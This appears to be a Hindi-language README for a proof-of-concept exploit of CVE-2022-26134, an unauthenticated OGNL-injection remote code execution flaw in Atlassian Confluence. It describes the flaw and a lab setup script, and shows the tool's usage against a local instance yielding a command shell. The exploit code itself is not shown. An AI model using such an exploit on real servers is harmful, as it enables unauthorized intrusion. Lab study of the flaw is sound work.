
CVE-2022-26134 के लिए शोषण: OGNL इंजेक्शन के माध्यम से कन्फ्लुएंस बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन
OGNL भूमि में एक और शोषण
कॉन्फ्लुएंस ऑस्ट्रेलियाई सॉफ्टवेयर कंपनी Atlassian द्वारा विकसित एक वेब-आधारित कॉर्पोरेट विकी है।
02 जून, 2022 को Atlassian ने अपने Confluence Server और Data Center अनुप्रयोगों के लिए एक सुरक्षा सलाह जारी की, जिसमें एक गंभीर गंभीरता वाली अप्रमाणित रिमोट कोड निष्पादन भेद्यता पर प्रकाश डाला गया। OGNL इंजेक्शन भेद्यता एक अप्रमाणित उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
अपना लैब सेटअप करने के लिए, start_conflunce.sh चलाएँ और यहाँ दिए गए निर्देशों का पालन करें।
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence